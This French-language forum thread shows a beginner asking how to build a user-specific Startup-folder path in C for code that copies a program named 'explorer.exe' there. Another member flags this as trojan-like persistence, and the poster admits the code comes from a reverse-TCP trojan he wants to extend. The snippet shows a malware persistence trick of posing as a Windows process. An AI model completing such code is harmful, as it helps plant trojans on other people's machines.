Ajouter ) à un chemin d'accès [Résolu]

Signaler
-
 CoDForlan -
Bonjour,
Je n'arrive pas à mettre getenv("USERNAME") dans ma variable userpath.
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib, "Ws2_32.lib")
int main(void){
 char userpath[20] = getenv("USERNAME");
 printf("%s\n", userpath);
 CopyFile("explorer.exe", "C:\\Users\\Utilisateur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\explorer.exe", FALSE);
return 0;
}

il m'indique se code d'erreur :
.\test.c:7:22: error: invalid initializer
7 | char userpath[20] = getenv("USERNAME");
|

Merci pour vos réponses
Cordialement

3 réponses

Messages postés
11483
Date d'inscription
lundi 9 juin 2008
Statut
Contributeur
Dernière intervention
7 juillet 2020
656
bonjour, connais-tu la fonction strcpy()?
Non désoler je commence juste à apprendre le c
le problème c'est que je n'arrive pas à inclure la fonction getenv("USERNAME") dans le chemin d'accès
Messages postés
11483
Date d'inscription
lundi 9 juin 2008
Statut
Contributeur
Dernière intervention
7 juillet 2020
656
je suggère alors que tu commences par des exercices plus simples.
>
Messages postés
11483
Date d'inscription
lundi 9 juin 2008
Statut
Contributeur
Dernière intervention
7 juillet 2020

Non mais ce n'est pas ma question.
Je veux juste comment je peux remplacer dans mon chemin d'accès "C:\\Users\\Utilisateur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\explorer.exe"
par "C:\\Users\\USERNAME\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\explorer.exe"
Messages postés
11483
Date d'inscription
lundi 9 juin 2008
Statut
Contributeur
Dernière intervention
7 juillet 2020
656 > CoDForlan
commence peut-être à étudier ceci: https://nicolasj.developpez.com/articles/libc/string
Messages postés
5380
Date d'inscription
mercredi 15 septembre 2004
Statut
Contributeur
Dernière intervention
3 juillet 2020
884
Salut CoDForlan,

Si je peux me permettre, c'est un peu étrange que tu veuilles faire une copie d'un programme qui s'appelle "explorer.exe", comme un processus Windows bien connu, dans le dossier système de lancement au démarrage de l'utilisateur... peux-tu nous expliquer pourquoi tu veux faire cela ?

Ce message, mis en contexte avec celui-ci : https://forums.commentcamarche.net/forum/affich-36708479-compilation-c-error-ld-returned-1-exit-status ne donne pas vraiment envie de t'aider.

Dal
Pourquoi je n'aurai pas le droit de tester (sur mes propres ordinateurs)des programmes pour que je puisse comprendre un peux mieux ce que fais celui si car si tu n'as pas remarquer ce n'est pas moi qui est écrit ce programme(je n'est pas le niveau) mais si n'arrive à le comprendre et en ajouter quelques fonctions supplémentaires je pourrai mieux comprendre comment marche par exemple ce type de trojan(reverse tcp).
Et je vais finir par te dire que de toute façon ça n'a aucun intérêt de piraté car je pence que la plupart des gens sont assez méfiant.